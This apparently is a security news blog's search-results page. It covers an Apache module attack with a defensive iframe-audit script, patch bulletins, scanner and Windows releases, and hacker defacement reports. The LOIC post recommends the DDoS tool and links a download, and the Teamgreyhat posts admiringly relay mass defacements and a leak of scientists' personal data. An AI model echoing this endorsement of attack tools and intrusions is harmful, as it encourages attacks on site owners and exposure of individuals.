Showing posts sorted by relevance for query web server.

Apache Web Server Under Stealth Attack

 
Online attackers seem to love to exploit Web servers, because they can add scripts that quickly and automatically add malicious links to static HTML pages via an iFrame tag, or code that attempts to exploit website visitors' PCs via drive-by downloads. But an attack discovered on Friday, dubbed Apmod, pushes this attack technique one step further by not just infecting static Web pages. "The attack was unusual in that the Web server itself was the infection target," said Cathal Mullaney, a security response engineer at Symantec, in a blog post. "When a Web server is infected like this, every user that requests any Web page from that Web server is a potential victim. This is opposed to cases where static Web pages are infected with malicious code--only those specific pages put a user at risk of infection."
This new attack, which has been seen in the wild but doesn't currently appear to be widespread, targets the popular Apache Web Server, which runs on Windows and Linux. According to Netcraft, Apache Web Server is now used to host about 204 million websites.
The attack is innovative in that it uses Apache's built-in filter capabilities. A filter, as defined by Apache, "is a process that is applied to data that is sent or received by the server," and can be used to add functionality without rewriting the code base. Many websites use this capability to add advertisements to Web pages on the fly, while also tracking that advertising delivery to generate revenue via ad agencies.
"We have discovered a malicious module that performs identical steps in order to include links to malicious websites," said Mullaney. "All of the actions performed by the rogue module are done using legitimate code provided by the Apache API, specifically for this type of on-the-fly content generation. This is not an exploit or a hack of Apache's code base; the module uses Apache's inherent functionality to infect users and attempts to redirect them to a malicious Web page."
Interestingly, the module doesn't attempt to infect every Web page it serves. In fact, it includes a number of anti-detection capabilities: it watches for signs of administrator access or processes, and it avoids serving malware to search engines. Furthermore, when it does serve a Web page infected with links to malicious websites, the module then temporarily blacklists the user's IP address to avoid delivering multiple infected Web pages, which might make its activities easier to detect. It then queries a command and control server to provide a new iFrame tag, further hampering detection.
As a result, "this is a complex and potentially difficult threat to detect accurately," said Mullaney. "As the rogue module contains a number of evasion techniques, it is possible that a system administrator would not notice the infection for some time. A further difficulty in detecting the threat is the on-the-fly nature of the infection. Since no Web pages are infected on the disk, no detections on stored HTML pages are possible."
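
Because nothing changes on disk, one way to narrow the gap Mullaney describes is to compare what the server actually sends with what is stored. The following is an added example, not code from Symantec or the original post; the host names, paths and HTML are constructed, and `trusted_hosts` is an assumed allowlist for legitimate filter-inserted content such as ads.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit
from urllib.request import Request, urlopen


class IframeCollector(HTMLParser):
    """Collect the src attribute of every <iframe> start tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.sources.append((dict(attrs).get("src") or "").strip())


def iframe_sources(html):
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.sources


def injected_iframes(disk_html, served_html):
    """Iframe sources present in the served response but not in the file on disk."""
    extra = Counter(iframe_sources(served_html)) - Counter(iframe_sources(disk_html))
    return sorted(extra.elements())


def classify(src, site_host, trusted_hosts):
    """Label an added iframe: same-site or allowlisted hosts are expected filter output."""
    try:
        host = (urlsplit(src).hostname or site_host).lower()
    except ValueError:  # malformed URL in src
        return "unexpected"
    if host == site_host or host in trusted_hosts:
        return "expected-filter"
    return "unexpected"


def audit(pages, site_host, trusted_hosts=frozenset()):
    """pages maps URL path -> (on-disk HTML, served HTML). Returns a list of findings."""
    findings = []
    for path, (disk_html, served_html) in sorted(pages.items()):
        for src in injected_iframes(disk_html, served_html):
            findings.append((path, src, classify(src, site_host, trusted_hosts)))
    return findings


def fetch_served(url, timeout=10):
    """Fetch a page as an ordinary visitor would see it (not used by the offline demo)."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    with urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


# Constructed sample data: on-disk files next to the responses a visitor received.
SAMPLE_PAGES = {
    "/index.html": (
        '<html><body><h1>Home</h1><iframe src="/widgets/news.html"></iframe></body></html>',
        '<html><body><h1>Home</h1><iframe src="/widgets/news.html"></iframe>'
        '<iframe src="http://redirector.invalid/in.php"></iframe></body></html>',
    ),
    "/about.html": (
        "<html><body>About</body></html>",
        '<html><body>About<iframe src="//ads.example.net/slot1"></iframe></body></html>',
    ),
    "/contact.html": (
        "<html><body>Contact</body></html>",
        "<html><body>Contact</body></html>",
    ),
}

if __name__ == "__main__":
    for path, src, verdict in audit(SAMPLE_PAGES, "www.example.org", {"ads.example.net"}):
        print(f"{verdict:16} {path:14} {src}")
```

Because the module described above skips administrators and IP addresses it has already served, run the fetch from an outside vantage point and repeat it over time; a single clean response does not clear the server.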


Mochahost Web Server Rooted, More Than 1250 Sites Hacked By Teamgreyhat


A few days ago the well-known hacker group Teamgreyhat rooted the Guyana Server and hacked more than 1500 websites. Now TGH has struck again with another big attack: the server of the web hosting company Mochahost was compromised, and more than 1250 websites were hacked by TGH. After this attack TGH claimed to be the "Achilles of Cyber World". To emphasize this statement they changed the background music of the hacked page and used famous quotes from the well-known movie Troy. If you dig into the history you will find that TGH has already made a name for itself on the web by hacking many web servers, such as Theexpert Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com, Guyana Server and many more. This attack again proves the strength of TGH. All the hacked sites can be found in a pastebin written by Teamgreyhat.

Press Release of TGH:- 
"Guyana Server Rooted, 1500 Websites Hacked By Teamgreyhat
T-Series Official Website Hacked By Teamgreyhat (TGH)
Theexpert Server Rooted By TGH
Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat
Cybertek Web-Server Rooted By TGH 
& & & Many more..............
Yet moooooooooooore to Come.................


The Common question arise and that is who is TGH and what we are capable of???
Here is the Answer


We are TGH 
We are Warriors 
We are Achilles of Cyber World
............
"Remember, I will still be here
As long as you hold me, in your memory


Remember, when your dreams have ended
Time can be transcended 
Just remember me


I am the one star that keeps burning, so brightly,
It is the last light, to fade into the rising sun


I'm with you
Whenever you tell, my story
For I am all I've done


Remember, I will still be here
As long as you hold me, in your memory
Remember me


I am that one voice in the cold wind, that whispers
And if you listen, you'll hear me call across the sky


As long as I still can reach out, and touch you
Then I will never die


Remember, I'll never leave you
If you will only
Remember me


Remember me...


Remember, I will still be here
As long as you hold me
In your memory


Remember, when your dreams have ended
Time can be transcended
I live forever 
Remember me


Remember me
Remember... me..."





Windows 8 Consumer Preview & Windows Server 8 Beta By Microsoft (Freely Downloadable)

Microsoft Released Windows 8 Consumer Preview & Windows Server 8 Beta (Freely Downloadable)
A double boom for Windows lovers. Software giant Microsoft has officially released the Consumer Preview Windows 8 & Windows Server 8 Beta.
Windows 8 Consumer Preview :-
The Windows 8 Consumer Preview offers a more robust experience for testing the world's most popular operating system and is available to the widest range of people yet following the initial release of the Windows 8 Developer Preview late last year. The Developer Preview received more than 3 million downloads.
"With Windows 8, we reimagined the different ways people interact with their PC and how to make everything feel like a natural extension of the device, whether using a Windows 8 tablet, laptop or all-in-one," said Steven Sinofsky, president of the Windows and Windows Live Division at Microsoft. "The Windows 8 Consumer Preview brings a no-compromises approach to using your PC."
The test "beta" version of the revamped system was introduced at the Mobile World Congress in Barcelona, the planet's largest cell phone trade show, and Windows 8 borrows some of the look of Microsoft's Windows Phone 7 software. Windows 8 doesn't have the traditional "Start" menu, and applications are spread across a mosaic of tiles in a design Microsoft calls "Metro", seen as a scramble by the company to preserve its market share. Executives said it powers up on PCs in eight seconds, much faster than the previous version.
What is New In Windows 8 Consumer Preview :-
  • Broad range of product changes and improvements. Since the Developer Preview in September, designed to preview the programming platform, Windows 8 has progressed across every dimension. From completing the user experience for touch, keyboard and mouse to refining the development platform, the Consumer Preview improves performance, quality and reliability across all subsystems. With the added features, it represents a more complete view of the capabilities of Windows 8.
  • Windows Store with new apps. The Windows 8 Consumer Preview marks the beta opening of the Windows Store, which is filled with a variety of new Metro style apps from both third-party developers and Microsoft. During the Consumer Preview, these apps are available to try and experience at no cost to users. The Windows Store will offer personalised recommendations, and Windows 8 gives users the ability to take their apps and settings with them across multiple PCs, making it easy to discover and try new apps while offering developers the greatest opportunity of any platform.
  • Connecting to the cloud across Windows-based PCs and Windows Phone 7. The Windows 8 Consumer Preview offers seamless integration with the content people care about across their Web services. An optional additional sign-on with a Microsoft account provides access to a host of features, including the ability to roam all settings, use cloud storage, communicate with email, calendar and contacts, and connect to a broad range of services. Your connection to the cloud works across your Windows-based PCs and your Windows 7 phones.
  • Internet Explorer 10 Platform Preview 5. The best way to experience the Web on Windows is with Internet Explorer 10. The browser has been re-imagined to create a new experience designed specifically for Windows 8 devices. It provides an edge-to-edge user interface that is all about less browser and more Web. Fast and fluid, Internet Explorer is hardware-accelerated to enable Web performance.
  • Preview of new hardware capabilities. At the event, Microsoft also showcased Windows 8 running on a wide range of new x86- and ARM-based reference hardware. This hardware will be available to select developers for trial and testing as previously announced.
Additional details can be found on the official website of Microsoft Windows. Microsoft has also made the Windows 8 Consumer Preview available as a free download.

Windows Server 8 Beta :- 
The beta of Windows Server 8 is now available for IT professionals and software developers around the world to download. On the official Windows Server blog, Bill Laing, Corporate Vice President of Microsoft Corporation, said: In September we introduced Windows Server “8” with a preview to help developers and hardware partners prepare new and existing applications, systems and devices. The response from that community, along with hundreds of customers in our early adopters program, has been incredibly positive. A common theme of feedback has been how broad and deep the new capabilities are. Now is the time for you, IT professionals in organizations of all sizes, to get your hands on this new release, discover the new capabilities and contribute to the development of what we call the cloud-optimized OS.
I’ll highlight in this post just a few examples of new capabilities that you’ll want to explore. With the new Hyper-V we are taking virtualization above and beyond to provide a multi-tenant platform for cloud computing. For example, with Hyper-V Network Virtualization you can create virtual networks so different business units, or even multiple customers, can seamlessly share network infrastructure.  You will be able to move virtual machines and servers around without losing their network assignments. In Windows Server “8” we are delivering high availability and disaster recovery through software technology on much more cost effective hardware. For example, with File Server Transparent Failover you can now more easily perform hardware or software maintenance of nodes in a File Server cluster by moving file shares between nodes with little interruption to server applications that are storing data on those file shares. We’re also delivering a tremendous amount of new capabilities for multi-machine management and automation. You will want to explore the dramatic new improvements to Server Manager, as well as the new Windows PowerShell. With 2,300 commandlets provided out of the box, Windows PowerShell allows you to automate everything you can do manually with the user interface. And, with technologies like Intellisense, we’ve made it very easy for you to master all of that power. Additionally, Windows Server “8” provides a powerful server application platform that enables you to develop and host the most demanding of application workloads. For example, with .NET Framework 4.5 you can take advantage of new asynch language and library support to build server and web applications that scale far beyond what other platforms provide. Our new IIS 8 web server provides better security isolation and resource sand-boxing between applications, native support for web sockets, and the ability to host significantly more sites on a server.

For Additional Information & To Download Windows Server 8 Beta Click Here



Microsoft Patches 34 Serious Vulnerabilities



In today's Patch Tuesday, Microsoft released 16 bulletins addressing 34 vulnerabilities in Microsoft Windows, Microsoft Office, Internet Explorer, .NET, SQL, Visual Studio, Silverlight, VML and ISA. Nine of the bulletins are rated Critical, with seven rated as Important. Wolfgang Kandek, Qualys CTO, comments: "The only bulletin with a known exploit in the wild is MS11-046, a local privilege escalation flaw in the 'afd.sys' driver. IT admins can check with their end-point security providers for coverage, but should include this bulletin high on their to-do lists in any case, as it is only a matter of time until we see more attackers use malware taking advantage of this exploit to gain control of your workstations."

Here are the bulletins:-

Vulnerability in OLE Automation 
This security update resolves a privately reported vulnerability in Microsoft Windows Object Linking and Embedding (OLE) Automation. The vulnerability could allow remote code execution if a user visits a Web site containing a specially crafted Windows Metafile (WMF) image. In all cases, however, an attacker would have no way to force users to visit such a Web site. Instead, an attacker would have to convince users to visit a malicious Web site, typically by getting them to click a link in an e-mail message or Instant Messenger request.

Vulnerability in .NET Framework and Microsoft Silverlight
This security update resolves a privately reported vulnerability in Microsoft .NET Framework and Microsoft Silverlight. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs) or Silverlight applications. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario. This vulnerability could also be used by Windows .NET applications to bypass Code Access Security (CAS) restrictions.

Vulnerability in Threat Management Gateway Firewall Client 
This security update resolves a privately reported vulnerability in the Microsoft Forefront Threat Management Gateway (TMG) 2010 Client, formerly named the Microsoft Forefront Threat Management Gateway Firewall Client. The vulnerability could allow remote code execution if an attacker leveraged a client computer to make specific requests on a system where the TMG firewall client is used.

Vulnerability in Windows Kernel-Mode Drivers
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user visits a network share (or visits a web site that points to a network share) containing a specially crafted OpenType font (OTF). In all cases, however, an attacker would have no way to force a user to visit such a web site or network share. Instead, an attacker would have to convince a user to visit the web site or network share, typically by getting them to click a link in an e-mail message or Instant Messenger message.

Vulnerabilities in Distributed File System
This security update resolves two privately reported vulnerabilities in the Microsoft Distributed File System (DFS). The more severe of these vulnerabilities could allow remote code execution when an attacker sends a specially crafted DFS response to a client-initiated DFS request. An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.

Vulnerability in SMB Client
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sent a specially crafted SMB response to a client-initiated SMB request. To exploit the vulnerability, an attacker must convince the user to initiate an SMB connection to a specially crafted SMB server.

Vulnerability in .NET Framework
This security update resolves a publicly disclosed vulnerability in Microsoft .NET Framework. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs). Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario. This vulnerability could also be used by Windows .NET applications to bypass Code Access Security (CAS) restrictions.

Cumulative Security Update for Internet Explorer
This security update resolves eleven privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Vulnerability in Vector Markup Language
This security update resolves a privately reported vulnerability in the Microsoft implementation of Vector Markup Language (VML). This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients; and Moderate for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers. Internet Explorer 9 is not affected by the vulnerability.

The vulnerability could allow remote code execution if a user viewed a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Vulnerability in MHTML
This security update resolves a publicly disclosed vulnerability in the MHTML protocol handler in Microsoft Windows. The vulnerability could allow information disclosure if a user opens a specially crafted URL from an attacker's Web site. An attacker would have to convince the user to visit the Web site, typically by getting them to follow a link in an e-mail message or Instant Messenger message.

Vulnerabilities in Microsoft Excel
This security update resolves eight privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file. An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. Installing and configuring Office File Validation (OFV) to prevent the opening of suspicious files blocks the attack vectors for exploiting the vulnerabilities described in CVE-2011-1272, CVE-2011-1273, and CVE-2011-1279. Microsoft Excel 2010 is only affected by CVE-2011-1273 described in this bulletin. The automated Microsoft Fix it solution, "Disable Edit in Protected View for Excel 2010," available in Microsoft Knowledge Base Article 2501584, blocks the attack vectors for exploiting CVE-2011-1273.

Vulnerability in Ancillary Function Driver
This security update resolves a publicly disclosed vulnerability in the Microsoft Windows Ancillary Function Driver (AFD). The vulnerability could allow elevation of privilege if an attacker logs on to a user's system and runs a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability.

Vulnerability in Hyper-V
This security update resolves a privately reported vulnerability in Windows Server 2008 Hyper-V and Windows Server 2008 R2 Hyper-V. The vulnerability could allow denial of service if a specially crafted packet is sent to the VMBus by an authenticated user in one of the guest virtual machines hosted by the Hyper-V server. An attacker must have valid logon credentials and be able to send specially crafted content from a guest virtual machine to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Vulnerability in SMB Server
This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow denial of service if an attacker created a specially crafted SMB packet and sent the packet to an affected system. Firewall best practices and standard default firewall configurations can help protect networks from attacks originating outside the enterprise perimeter that would attempt to exploit this vulnerability.

Vulnerability in the Microsoft XML Editor
This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.

Vulnerability in Active Directory Certificate Services Web Enrollment
This security update resolves a privately reported vulnerability in Active Directory Certificate Services Web Enrollment. The vulnerability is a cross-site scripting (XSS) vulnerability that could allow elevation of privilege, enabling an attacker to execute arbitrary commands on the site in the context of the target user. An attacker who successfully exploited this vulnerability would need to send a specially crafted link and convince a user to click the link. In all cases, however, an attacker would have no way to force a user to visit the Web site. Instead, an attacker would have to persuade a user to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes the user to the vulnerable Web site.


Acunetix Web Vulnerability Scanner 8 BETA Arrived

Acunetix, one of the world's famous web vulnerability scanners, has released its next version, WVS 8 BETA. Many of you have been biting your nails in anticipation of this Beta, so sit tight and read on for the next most important stage in the evolution of Acunetix WVS. Version 8 of Web Vulnerability Scanner has been optimized to make life easier at every stage of a security scan. WVS is easier to use for web admins and security analysts alike: enhanced automation, ability to save scan settings as a template to avoid reconfiguration, and multiple instance support for simultaneous scans of several websites. WVS 8 also ushers in an exciting new co-operation between Acunetix and Imperva, developers of the industry’s leading Web Application Firewall.

Some Improved Features:-    
  • AcuSensor Technology
  • An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
  • Industry's most advanced and in-depth SQL injection and Cross site scripting testing
  • Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
  • Visual macro recorder makes testing web forms and password protected areas easy
  • Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
  • Extensive reporting facilities including VISA PCI compliance reports
  • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
  • Intelligent crawler detects web server type and application language
  • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
  • Port scans a web server and runs security checks against network services running on the server  
Brief Description of Acunetix 8 Features:-

Manipulation of inputs from URLs:-
Acunetix WVS can automatically detect URL parameters and manipulate them to detect vulnerabilities. This technology is not present in any other competing vulnerability scanner.

Automatic IIS 7 rewrite rule interpretation:-
Using the web application’s web.config file, WVS 8 can automatically interpret rewrite rules without requiring any manual input.

Support for custom HTTP headers:-
To function correctly, some web applications need incoming requests to contain specific HTTP headers. It is now possible to define custom HTTP headers to be used during automated scans.

Imperva Web Application Firewall integration:-
An exciting co-operation between Imperva and Acunetix: WVS 8 scan results can be automatically imported into an Imperva Web Application Firewall and interpreted as rules.

New vulnerability class: HTTP Parameter Pollution:-
At the time of writing, Acunetix WVS 8 is the only scanner that tests for this security vulnerability.

Multiple instance support:-
Acunetix WVS 8 can be relaunched as multiple instances on the same machine, allowing the user to scan multiple websites and opening up further support for multi-user scenarios on the same server/workstation.

Redesigned Scheduler:-
Accessible via a web interface, the new Scheduler allows administrators to download scan results from any workstation, laptop, or smartphone. The new Scheduler will automatically launch another instance of WVS when multiple web scans are due, preventing multiple processes from depending on the resources of one WVS instance and thereby allowing scans to complete in less time.

Automatic custom 404 error page recognition and detection:-
Acunetix WVS 8 can automatically determine if a custom error page is in use and recognizes it without requiring any custom 404 recognition patterns to be configured for a scan.

Scan settings templates:-
WVS 8 now allows the settings for the scan of a specific application to be saved as individual templates, making it quick and easy to recall the exact settings for a website each time it is scanned. This is particularly useful when scanning multiple sites, allowing the user to load the template for each site instead of re-configuring all the settings manually.

Simplified Scan Wizard:-
In addition to the introduction of Scan Settings Templates and automatic custom 404 error page recognition, the Scan Wizard contains far fewer options, so it’s much easier and quicker to kick off a scan.

Smart memory management:-
The following settings have been added to ensure even the most complex scans will complete automatically and successfully:-
  • Define number of files per directory
  • Limit number of subdirectories per website
  • Assign Crawler memory limit

Real-time Crawler status:-
Crawler data is now updated in real time and provides live feedback on how many files have been crawled, how many inputs have been detected, and more.

Scan termination status included in report:-
Reports now include the termination or completion status of each vulnerability scan. For example, the report will display whether the scan was completed successfully or halted manually.

Web application coverage report:-
A new report template that lists all the web application files crawled and specific vulnerability tests performed on each file.

Log file retention:-
It is now possible to define the retention span before log files are automatically flushed, to ensure logs are not deleted each time WVS is restarted.


To Download Acunetix Web Vulnerability Scanner 8 BETA Click Here



Colombiaweb Server Rooted More Than 2K Websites Hacked By Teamgreyhat (TGH)


The well-known hacker group Teamgreyhat has struck again. In this attack they rooted colombiaweb's web server and hacked into more than 2000 websites. TGH released a pastebin note listing all the hacked sites along with their message. If you dig into the recent past you will find that TGH has already built a distinct reputation on the web. This black-hat group is especially expert at rooting servers. Earlier they rooted Mochahost Web Server, Guyana Server, Theexpert Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com and many more. One of their big blows was hacking the Hotmail mail servers. This hack of 2000 sites again proves the capabilities of TGH.




LOIC: DoS Attack Tool




LOIC basically turns your computer’s network connection into a firehose of garbage requests, directed towards a target web server. On its own, one computer rarely generates enough TCP, UDP, or HTTP requests at once to overwhelm a web server: garbage requests can easily be ignored while legitimate requests for web pages are responded to as normal. But when thousands of users run LOIC at once, the wave of requests becomes overwhelming, often shutting a web server (or one of its connected machines, like a database server) down completely, or preventing legitimate requests from being answered.
LOIC is more focused on web applications; we can also call it an application-based DoS attack. LOIC can be used on a target site by flooding the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.
LOIC is a nice tool to perform DoS or DDoS attacks, but try it at your own risk. It does not have the ability to hide your IP address. Source code is also available.
Download LOIC 1.0.4 here


12 Thousand Websites Hacked By Teamgreyhat (TGH)

12 Thousand Websites Hacked By Teamgreyhat (TGH) For #Free Education & #Health in India
Hacktivist group Teamgreyhat has struck again, and this time it was a really big one. In this blow they hit more than 12 thousand websites. Indeed, this is the biggest attack ever carried out by TGH. According to TGH, "this attack is just the trailer........ wait and stay tuned for the entire episode...." In their press release TGH also declared that their next targets will be two high-profile websites of India: Central Drug Research Institute (CDRI) and Bhabha Atomic Research Centre (BARC). Through this massive attack the hacker group also spread their message, which is:-
#free education from the beginning to masters....or even more.
#free health (proper treatment)
The official press release and all the hacked sites can be found in a tinypaste post. The deface mirror can be found on zone-hack. Among the hacked sites there are thousands of high-profile sites, such as government bodies, business organizations, educational sites, the commercial sector, IT industry sites and many more. TGH also claimed that the list of hacked sites spans the cyberspace of many countries, such as India, UK, US, Bangladesh and so on. To make this possible they hacked more than 5 web servers. A few days ago TGH rooted a government server and in that attack hacked more than 5K sites. If you dig into the history you will find that this group has earlier hacked many web servers, such as Ankit Fadia's Server, Colombiaweb, Mochahost Web Server, Guyana Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com, Theexpert Server and so on.





LG Australia Hacked By Intra Web Security Exploit Team


The official website of LG Australia has been hacked and defaced by Intra Web Security Exploit Team.

Hacked Site:-
www.lge.com.au
Mirror Link:-
http://www.zone-h.org/mirror/id/15669350
 

The site went offline in mid-afternoon (Sydney time); LG later recovered it, and it now redirects to www.lg.com/au/
Ty Miller, CTO with security firm Pure Hacking, said the attacker had compromised the web server hosting LG's site. This is usually more serious than another common website defacement method called an SQL Injection, which allows websites to be defaced via exploiting a hole in a web application without the hackers accessing the web server itself. "It looks like the attacker has compromised the web server itself as the website home page has been replaced completely," said Miller.
"Usually if the web application itself was compromised via Stored Cross Site Scripting or SQL Injection then you would still see the original home page HTML code containing the malicious code."
LG said it was alerted to the hack on Friday morning and immediately suspended the site "until the incident is fully investigated". It said the attack only affected lge.com.au, not lg.com.au, which had replaced the former as the "local primary hosting solution" a number of years ago.



CDRI- Central Drug Research Institute Hacked By Teamgreyhat

CDRI- Central Drug Research Institute Hacked By Teamgreyhat, Database Exposed
Hacktivist Teamgreyhat continues its operation. Just a few days ago they hacked more than 12K websites worldwide; TGH authority claimed that their aim is "#Free Education & #Health in India". In the last press release TGH also vowed that they would hit CDRI (Central Drug Research Institute), and today they did exactly that. They have hacked the database of CDRI and exposed all the scientists' details, including full name, designation, group, phone number, email ID and so on. The hacked DB and the press release can be found in a pastebin release by the hacker group. Earlier this group hacked many high-profile sites and servers, such as Trinidad Govt Server, Ankit Fadia's Server, Colombiaweb, Mochahost Web-Server, Guyana Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com, Theexpert Server and so on.





Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat

The web server of Malaysian web hosting company Jomhosting.net has been compromised, and more than 150 sites were hacked and defaced by Teamgreyhat (TGH). First, TGH hacked into the web server and defaced all the websites on that server. Later, according to the TGH officials:-
"honestly saying there were tooo many sites to deface.....so we are just bloody tired...also our mass defacer script was not working so we (R00t3r, 3rr0R, Skywalk3r & Zero) dumped the entire server. Hope the admin will forgive our silly mistake... :P lolzzzz..."

Official Website of Jomhosting:-
http://jomhosting.net/

Mirror Link:-
http://www.arab-zone.org/mirror/15992/jomhosting.net/





Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update


Oracle is all set for the upcoming critical patch update. The pre-release announcement by the company indicates that in all 73 vulnerabilities associated with numerous products will be mitigated during the next critical patch update. The update will mitigate security vulnerabilities associated with Oracle database server, fusion middleware, enterprise manager, e-business suite, supply chain products, PeopleSoft, JD Edwards suite, Siebel CRM, industry applications, Sun products and Open office suite.

The company releases quarterly critical patch updates on Tuesday closest to 17th day of January, April, July and October. The company uses Common Vulnerability Scoring System (CVSS) version 2.0 to rate vulnerabilities. The vulnerabilities are assigned scores based on the prerequisites for exploiting the vulnerability, ease of exploit, and impact of the attack on availability, confidentiality and integrity. Base scores range from 0.0 to 10.0 with ten being the most severe vulnerability.

Vulnerabilities may be caused by technological flaws, programming errors, and other human errors. Developers are required to constantly upgrade their technical skills through online IT degree courses, training programs and refresher courses to deal with ever-evolving threats.

The critical patch update will address six vulnerabilities in database server. The vulnerabilities affect components such as application service level management, database vault, Oracle help, security service, warehouse builder, UIX and network foundation. Two of the six vulnerabilities do not require authentication for exploitation of vulnerabilities. Highest base score for security flaws affecting database server is 6.5. The update will mitigate 9 flaws associated with fusion middleware, 6 of which are exploitable without authentication.

The vulnerabilities affect Oracle Help, HTTP Server, JRockit, Outside In Technology, security service, WebLogic Server, Portal and Single Sign-On. Oracle has assigned the highest severity score of 10 for vulnerabilities affecting fusion middleware. 4 vulnerabilities will be fixed in Oracle applications, 2 of which are exploitable without authentication. The vulnerabilities have been assigned a base score of 4.3 and affect application object library, applications install, and web ADI. The update will resolve a flaw in the Supply chain products suite, which is exploitable without authentication. The highest base score for a vulnerability in the supply chain products suite is 4.3, and it affects the Agile technology program.

14 security flaws related to PeopleSoft Suite will be fixed in the upcoming critical patch, 1 of which is exploitable without authentication. The highest base score for security flaws associated with the PeopleSoft suite is 4.3; they affect PeopleSoft Enterprise, Enterprise CRM, ELS, HRMS and People tools. The critical patch update will resolve 8 issues associated with the JD Edwards suite, 7 of which are exploitable without authentication. The highest base score for vulnerabilities in the JD Edwards suite is 6.4; they affect EnterpriseOne tools.

The update will address a vulnerability associated with industry applications, which affects InForm. Highest base score for vulnerability in industry applications is 5.5. 8 security flaws will be mitigated in Sun products suite, seven of which are exploitable without authentication. Oracle has assigned highest severity score of 10 for security flaws affecting Sun products suite. The components affected include Java Dynamic Management Kit, Java system web server, Solaris, OpenSSO Enterprise, GlassFish Enterprise server, java system application server, java system access manager policy agent, and java system messaging server.

The upcoming critical patch update will fix 8 security issues related to Open Office suite, of which 7 are exploitable without authentication. Highest base score for security flaws in Open Office suite is 9.3. Open Office, StarOffice and StarSuite are affected by the vulnerabilities.

Vulnerabilities are identified by professionals qualified in IT degree programs and security certifications such as penetration testing. Developers encourage both in-house and independent security researchers to detect and report security flaws so that they can be mitigated before exploitation by attackers.

Online IT courses, e-tutorials, security blogs and alerts from computer emergency response teams could help users in gaining insights on security threats, their implications and importance of security updates. Users must keep track of the security releases and install necessary updates to safeguard their systems and data from unauthorized access. 


Microsoft Releases Windows Server 2012 [Download Now]

Microsoft Releases Windows Server 2012 With Complete Virtualization, Cloud Services, Improved Scalability & Performance [Download Now]

In March this year software giant Microsoft announced the availability of Windows Server 8; in April it was renamed Windows Server 2012. Windows Server powers many of the world's largest datacenters, enables small businesses around the world, and delivers value to organizations of all sizes in between. Windows Server 2012 redefines the server category, delivering hundreds of new features and enhancements spanning virtualization, networking, storage, user experience, cloud computing, automation, and more. Simply put, Windows Server 2012 helps you transform your IT operations to reduce costs and deliver a whole new level of business value. With Windows Server 2012, Microsoft delivers a server platform built on its experience of building and operating many of the world's largest cloud-based services and datacenters. Whether you are setting up a single server for your small business or architecting a major new datacenter environment, Windows Server 2012 will help you cloud-optimize your IT so you can fully meet your organization's unique needs.

Features at a Glance:- 

Beyond Virtualization:- Offers a dynamic, multitenant infrastructure to help you scale and secure workloads and build a private cloud. Windows Server 2012 can help you provide:

  • Complete Virtualization Platform- A fully-isolated, multitenant environment with tools that can help guarantee service level agreements, enable usage-based chargeback, and support self-service delivery.
  • Improved Scalability and Performance- A high-density, scalable environment that you can modify to perform at an optimum level based on your needs.
  • Connecting to Cloud Services- A common identity and management framework to enable highly secure and reliable cross-premises connectivity.

